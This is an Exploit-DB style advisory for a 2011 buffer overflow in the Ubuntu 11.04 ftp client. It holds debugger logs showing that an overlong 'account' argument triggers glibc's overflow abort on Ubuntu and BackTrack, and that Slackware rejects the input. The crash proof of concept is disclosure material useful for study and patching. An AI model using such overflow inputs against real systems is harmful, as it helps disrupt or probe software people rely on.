Ubuntu 11 (and below) ftp client buffer overflow

vendor:
Ubuntu Linux
by:
Kron0
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Ubuntu Linux
Affected Version From: 11
Affected Version To: 11.04
Patch Exists: Yes
Related CWE: N/A
CPE: o:ubuntu:ubuntu_linux:11.04
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2011
Ubuntu 11 (and below) ftp client buffer overflow

Ubuntu 11 (and below) ftp client seems to crash when passing large arguments to the "account" command, while a connection is made to any ftp server. This is due to a buffer overflow vulnerability.
Mitigation:

Upgrade to a version of Ubuntu that is not affected by this vulnerability.
Source
Exploit-DB raw data:

Ubuntu 11 (and below) ftp client seems to crash when passing large arguments to the "account" command, while a connection is made to any ftp server. Example:

Ubuntu 11.04 x86:
=================

(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:kron0): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user ftp@10.0.0.9 !
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x50)[0x27fdf0]
/lib/i386-linux-gnu/libc.so.6(+0xe4cca)[0x27ecca]
/lib/i386-linux-gnu/libc.so.6(+0xe41ed)[0x27e1ed]
/usr/bin/ftp[0x804b5e2]
/usr/bin/ftp[0x8055ead]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xe7)[0x1b0e37]
/usr/bin/ftp[0x8049d61]
======= Memory map: ========
00110000-0012c000 r-xp 00000000 08:01 525108     /lib/i386-linux-gnu/ld-2.13.so
0012c000-0012d000 r--p 0001b000 08:01 525108     /lib/i386-linux-gnu/ld-2.13.so
0012d000-0012e000 rw-p 0001c000 08:01 525108     /lib/i386-linux-gnu/ld-2.13.so
0012e000-0012f000 r-xp 00000000 00:00 0          [vdso]
0012f000-0015d000 r-xp 00000000 08:01 524378     /lib/libreadline.so.6.2
0015d000-0015e000 r--p 0002e000 08:01 524378     /lib/libreadline.so.6.2
0015e000-00161000 rw-p 0002f000 08:01 524378     /lib/libreadline.so.6.2
00161000-00162000 rw-p 00000000 00:00 0
00162000-00196000 r-xp 00000000 08:01 524347     /lib/libncurses.so.5.7
00196000-00197000 ---p 00034000 08:01 524347     /lib/libncurses.so.5.7
00197000-00199000 r--p 00034000 08:01 524347     /lib/libncurses.so.5.7
00199000-0019a000 rw-p 00036000 08:01 524347     /lib/libncurses.so.5.7
0019a000-002f4000 r-xp 00000000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f4000-002f5000 ---p 0015a000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f5000-002f7000 r--p 0015a000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f7000-002f8000 rw-p 0015c000 08:01 525121     /lib/i386-linux-gnu/libc-2.13.so
002f8000-002fb000 rw-p 00000000 00:00 0
002fb000-002fd000 r-xp 00000000 08:01 525131     /lib/i386-linux-gnu/libdl-2.13.so
002fd000-002fe000 r--p 00001000 08:01 525131     /lib/i386-linux-gnu/libdl-2.13.so
002fe000-002ff000 rw-p 00002000 08:01 525131     /lib/i386-linux-gnu/libdl-2.13.so
002ff000-00309000 r-xp 00000000 08:01 525167     /lib/i386-linux-gnu/libnss_files-2.13.so
00309000-0030a000 r--p 00009000 08:01 525167     /lib/i386-linux-gnu/libnss_files-2.13.so
0030a000-0030b000 rw-p 0000a000 08:01 525167     /lib/i386-linux-gnu/libnss_files-2.13.so
0030b000-00311000 r-xp 00000000 08:01 525163     /lib/i386-linux-gnu/libnss_compat-2.13.so
00311000-00312000 r--p 00005000 08:01 525163     /lib/i386-linux-gnu/libnss_compat-2.13.so
00312000-00313000 rw-p 00006000 08:01 525163     /lib/i386-linux-gnu/libnss_compat-2.13.so
00313000-00326000 r-xp 00000000 08:01 525161     /lib/i386-linux-gnu/libnsl-2.13.so
00326000-00327000 r--p 00012000 08:01 525161     /lib/i386-linux-gnu/libnsl-2.13.so
00327000-00328000 rw-p 00013000 08:01 525161     /lib/i386-linux-gnu/libnsl-2.13.so
00328000-0032a000 rw-p 00000000 00:00 0
0032a000-00333000 r-xp 00000000 08:01 525171     /lib/i386-linux-gnu/libnss_nis-2.13.so
00333000-00334000 r--p 00008000 08:01 525171     /lib/i386-linux-gnu/libnss_nis-2.13.so
00334000-00335000 rw-p 00009000 08:01 525171     /lib/i386-linux-gnu/libnss_nis-2.13.so
00335000-0034f000 r-xp 00000000 08:01 525149     /lib/i386-linux-gnu/libgcc_s.so.1
0034f000-00350000 r--p 00019000 08:01 525149     /lib/i386-linux-gnu/libgcc_s.so.1
00350000-00351000 rw-p 0001a000 08:01 525149     /lib/i386-linux-gnu/libgcc_s.so.1
08048000-08059000 r-xp 00000000 08:01 1573707    /usr/bin/netkit-ftp
08059000-0805a000 r--p 00011000 08:01 1573707    /usr/bin/netkit-ftp
0805a000-0805b000 rw-p 00012000 08:01 1573707    /usr/bin/netkit-ftp
0805b000-080ab000 rw-p 00000000 00:00 0          [heap]
b7dee000-b7fee000 r--p 00000000 08:01 1581098    /usr/lib/locale/locale-archive
b7fee000-b7ff0000 rw-p 00000000 00:00 0
b7ff9000-b7ffa000 r--p 002a1000 08:01 1581098    /usr/lib/locale/locale-archive
b7ffa000-b8000000 rw-p 00000000 00:00 0
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]

Program received signal SIGABRT, Aborted.
0x0012e416 in __kernel_vsyscall ()
(gdb) i r
eax            0x0    0
ecx            0xc8e    3214
edx            0x6    6
ebx            0xc8e    3214
esp            0xbfffdde4    0xbfffdde4
ebp            0xbfffddf0    0xbfffddf0
esi            0x0    0
edi            0x2f6ff4    3108852
eip            0x12e416    0x12e416 <__kernel_vsyscall+2>
eflags         0x246    [ PF ZF IF ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)

============================================================================================================================================================

Ubuntu 11.04 x64 and Backtrack 5 R1 (which is based in Ubuntu) crash, too:
==========================================================================

Ubuntu 11.04 x64:
=================

$ gdb /usr/bin/ftp
GNU gdb (Ubuntu/Linaro 7.2-1ubuntu11) 7.2
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Para las instrucciones de informe de errores, vea:
<http://www.gnu.org/software/gdb/bugs/>...
Leyendo símbolos desde /usr/bin/ftp...(no se encontraron símbolos de depuración)hecho.
(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:kron0): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user ftp@10.0.0.5 !
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x37)[0x7ffff76c01d7]
/lib/x86_64-linux-gnu/libc.so.6(+0xfd0f0)[0x7ffff76bf0f0]
/lib/x86_64-linux-gnu/libc.so.6(+0xfc264)[0x7ffff76be264]
/usr/bin/ftp[0x404039]
/usr/bin/ftp[0x40ec18]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xff)[0x7ffff75e0eff]
/usr/bin/ftp[0x402889]
======= Memory map: ========
00400000-00414000 r-xp 00000000 08:03 262461                             /usr/bin/netkit-ftp
00613000-00614000 r--p 00013000 08:03 262461                             /usr/bin/netkit-ftp
00614000-00616000 rw-p 00014000 08:03 262461                             /usr/bin/netkit-ftp
00616000-00687000 rw-p 00000000 00:00 0                                  [heap]
7ffff62e2000-7ffff62f7000 r-xp 00000000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff62f7000-7ffff64f6000 ---p 00015000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f6000-7ffff64f7000 r--p 00014000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f7000-7ffff64f8000 rw-p 00015000 08:03 1442972                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7ffff64f8000-7ffff6b82000 r--p 00000000 08:03 269561                     /usr/lib/locale/locale-archive
7ffff6b82000-7ffff6b8d000 r-xp 00000000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6b8d000-7ffff6d8c000 ---p 0000b000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8c000-7ffff6d8d000 r--p 0000a000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8d000-7ffff6d8e000 rw-p 0000b000 08:03 1442994                    /lib/x86_64-linux-gnu/libnss_nis-2.13.so
7ffff6d8e000-7ffff6da5000 r-xp 00000000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6da5000-7ffff6fa4000 ---p 00017000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa4000-7ffff6fa5000 r--p 00016000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa5000-7ffff6fa6000 rw-p 00017000 08:03 1442984                    /lib/x86_64-linux-gnu/libnsl-2.13.so
7ffff6fa6000-7ffff6fa8000 rw-p 00000000 00:00 0
7ffff6fa8000-7ffff6fb0000 r-xp 00000000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff6fb0000-7ffff71af000 ---p 00008000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71af000-7ffff71b0000 r--p 00007000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71b0000-7ffff71b1000 rw-p 00008000 08:03 1442986                    /lib/x86_64-linux-gnu/libnss_compat-2.13.so
7ffff71b1000-7ffff71bd000 r-xp 00000000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff71bd000-7ffff73bc000 ---p 0000c000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73bc000-7ffff73bd000 r--p 0000b000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73bd000-7ffff73be000 rw-p 0000c000 08:03 1442990                    /lib/x86_64-linux-gnu/libnss_files-2.13.so
7ffff73be000-7ffff73c0000 r-xp 00000000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff73c0000-7ffff75c0000 ---p 00002000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c0000-7ffff75c1000 r--p 00002000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c1000-7ffff75c2000 rw-p 00003000 08:03 1442954                    /lib/x86_64-linux-gnu/libdl-2.13.so
7ffff75c2000-7ffff774c000 r-xp 00000000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff774c000-7ffff794b000 ---p 0018a000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff794b000-7ffff794f000 r--p 00189000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff794f000-7ffff7950000 rw-p 0018d000 08:03 1442944                    /lib/x86_64-linux-gnu/libc-2.13.so
7ffff7950000-7ffff7956000 rw-p 00000000 00:00 0
7ffff7956000-7ffff7996000 r-xp 00000000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7996000-7ffff7b95000 ---p 00040000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7b95000-7ffff7b99000 r--p 0003f000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7b99000-7ffff7b9a000 rw-p 00043000 08:03 1439035                    /lib/libncurses.so.5.7
7ffff7b9a000-7ffff7bd3000 r-xp 00000000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7bd3000-7ffff7dd3000 ---p 00039000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7dd3000-7ffff7dd5000 r--p 00039000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7dd5000-7ffff7ddb000 rw-p 0003b000 08:03 1439066                    /lib/libreadline.so.6.2
7ffff7ddb000-7ffff7ddc000 rw-p 00000000 00:00 0
7ffff7ddc000-7ffff7dfd000 r-xp 00000000 08:03 1442931                    /lib/x86_64-linux-gnu/ld-2.13.so
7ffff7fcf000-7ffff7fd3000 rw-p 00000000 00:00 0
7ffff7ff5000-7ffff7ffb000 rw-p 00000000 00:00 0
7ffff7ffb000-7ffff7ffc000 r-xp 00000000 00:00 0                          [vdso]
7ffff7ffc000-7ffff7ffd000 r--p 00020000 08:03 1442931                    /lib/x86_64-linux-gnu/ld-2.13.so
7ffff7ffd000-7ffff7fff000 rw-p 00021000 08:03 1442931                    /lib/x86_64-linux-gnu/ld-2.13.so
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0                          [stack]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]

Program received signal SIGABRT, Aborted.
0x00007ffff75f5d05 in raise (sig=6) at ../nptl/sysdeps/unix/sysv/linux/raise.c:64
64    ../nptl/sysdeps/unix/sysv/linux/raise.c: No existe el fichero o el directorio.
    in ../nptl/sysdeps/unix/sysv/linux/raise.c
(gdb) i r
rax            0x0    0
rbx            0x0    0
rcx            0xffffffffffffffff    -1
rdx            0x6    6
rsi            0x5dea    24042
rdi            0x5dea    24042
rbp            0x7fffffffcfd0    0x7fffffffcfd0
rsp            0x7fffffffc608    0x7fffffffc608
r8             0x7ffff770d8c0    140737344755904
r9             0x400660    4195936
r10            0x8    8
r11            0x246    582
r12            0x9    9
r13            0x3a    58
r14            0x3a    58
r15            0x5    5
rip            0x7ffff75f5d05    0x7ffff75f5d05 <raise+53>
eflags         0x246    [ PF ZF IF ]
cs             0x33    51
ss             0x2b    43
ds             0x0    0
es             0x0    0
fs             0x0    0
gs             0x0    0
(gdb)

============================================================================================================================================================

Backtrack 5 R1:
===============

(gdb) run 10.0.0.8
Starting program: /usr/bin/ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** buffer overflow detected ***: /usr/bin/ftp terminated
======= Backtrace: =========
/lib/tls/i686/cmov/libc.so.6(__fortify_fail+0x50)[0xb7eea390]
/lib/tls/i686/cmov/libc.so.6(+0xe12ca)[0xb7ee92ca]
/lib/tls/i686/cmov/libc.so.6(+0xe07de)[0xb7ee87de]
/usr/bin/ftp[0x804b57c]
/usr/bin/ftp[0x8055abd]
/lib/tls/i686/cmov/libc.so.6(__libc_start_main+0xe6)[0xb7e1ebd6]
/usr/bin/ftp[0x8049cb1]
======= Memory map: ========
08048000-08059000 r-xp 00000000 08:01 153580     /usr/bin/netkit-ftp
08059000-0805a000 r--p 00010000 08:01 153580     /usr/bin/netkit-ftp
0805a000-0805b000 rw-p 00011000 08:01 153580     /usr/bin/netkit-ftp
0805b000-0808a000 rw-p 00000000 00:00 0          [heap]
b7d58000-b7d75000 r-xp 00000000 08:01 1180       /lib/libgcc_s.so.1
b7d75000-b7d76000 r--p 0001c000 08:01 1180       /lib/libgcc_s.so.1
b7d76000-b7d77000 rw-p 0001d000 08:01 1180       /lib/libgcc_s.so.1
b7d88000-b7d8f000 r--s 00000000 08:01 159757     /usr/lib/gconv/gconv-modules.cache
b7d8f000-b7dce000 r--p 00000000 08:01 161313     /usr/lib/locale/en_US.utf8/LC_CTYPE
b7dce000-b7dd6000 r-xp 00000000 08:01 5501       /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd6000-b7dd7000 r--p 00007000 08:01 5501       /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd7000-b7dd8000 rw-p 00008000 08:01 5501       /lib/tls/i686/cmov/libnss_nis-2.11.1.so
b7dd8000-b7deb000 r-xp 00000000 08:01 5491       /lib/tls/i686/cmov/libnsl-2.11.1.so
b7deb000-b7dec000 r--p 00012000 08:01 5491       /lib/tls/i686/cmov/libnsl-2.11.1.so
b7dec000-b7ded000 rw-p 00013000 08:01 5491       /lib/tls/i686/cmov/libnsl-2.11.1.so
b7ded000-b7def000 rw-p 00000000 00:00 0
b7def000-b7df5000 r-xp 00000000 08:01 5493       /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df5000-b7df6000 r--p 00006000 08:01 5493       /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df6000-b7df7000 rw-p 00007000 08:01 5493       /lib/tls/i686/cmov/libnss_compat-2.11.1.so
b7df7000-b7e01000 r-xp 00000000 08:01 5497       /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e01000-b7e02000 r--p 00009000 08:01 5497       /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e02000-b7e03000 rw-p 0000a000 08:01 5497       /lib/tls/i686/cmov/libnss_files-2.11.1.so
b7e03000-b7e04000 rw-p 00000000 00:00 0
b7e04000-b7e06000 r-xp 00000000 08:01 5486       /lib/tls/i686/cmov/libdl-2.11.1.so
b7e06000-b7e07000 r--p 00001000 08:01 5486       /lib/tls/i686/cmov/libdl-2.11.1.so
b7e07000-b7e08000 rw-p 00002000 08:01 5486       /lib/tls/i686/cmov/libdl-2.11.1.so
b7e08000-b7f5b000 r-xp 00000000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5b000-b7f5c000 ---p 00153000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5c000-b7f5e000 r--p 00153000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5e000-b7f5f000 rw-p 00155000 08:01 5480       /lib/tls/i686/cmov/libc-2.11.1.so
b7f5f000-b7f63000 rw-p 00000000 00:00 0
b7f63000-b7f97000 r-xp 00000000 08:01 1200       /lib/libncurses.so.5.7
b7f97000-b7f98000 ---p 00034000 08:01 1200       /lib/libncurses.so.5.7
b7f98000-b7f9a000 r--p 00034000 08:01 1200       /lib/libncurses.so.5.7
b7f9a000-b7f9b000 rw-p 00036000 08:01 1200       /lib/libncurses.so.5.7
b7f9b000-b7fca000 r-xp 00000000 08:01 1267       /lib/libreadline.so.6.1
b7fca000-b7fcb000 r--p 0002e000 08:01 1267       /lib/libreadline.so.6.1
b7fcb000-b7fce000 rw-p 0002f000 08:01 1267       /lib/libreadline.so.6.1
b7fce000-b7fcf000 rw-p 00000000 00:00 0
b7fdc000-b7fe2000 rw-p 00000000 00:00 0
b7fe2000-b7fe3000 r-xp 00000000 00:00 0          [vdso]
b7fe3000-b7ffe000 r-xp 00000000 08:01 1123       /lib/ld-2.11.1.so
b7ffe000-b7fff000 r--p 0001a000 08:01 1123       /lib/ld-2.11.1.so
b7fff000-b8000000 rw-p 0001b000 08:01 1123       /lib/ld-2.11.1.so
bffdf000-c0000000 rw-p 00000000 00:00 0          [stack]

Program received signal SIGABRT, Aborted.
0xb7fe2422 in __kernel_vsyscall ()
(gdb) i r
eax            0x0    0
ecx            0x659    1625
edx            0x6    6
ebx            0x659    1625
esp            0xbfffdbfc    0xbfffdbfc
ebp            0xbfffdc08    0xbfffdc08
esi            0x0    0
edi            0xb7f5dff4    -1208623116
eip            0xb7fe2422    0xb7fe2422 <__kernel_vsyscall+2>
eflags         0x200246    [ PF ZF IF ID ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51
(gdb)

Another Linux distribution did not crash, here is the example with Slackware 12:
================================================================================

Slackware 12:
=============

root@sl4ck1e:~# ftp 10.0.0.8
Connected to 10.0.0.8.
220 debianita FTP server ready.
Name (10.0.0.8:root): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230 Guest login ok, access restrictions apply.
ftp> account AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
sorry, input line too long

ftp>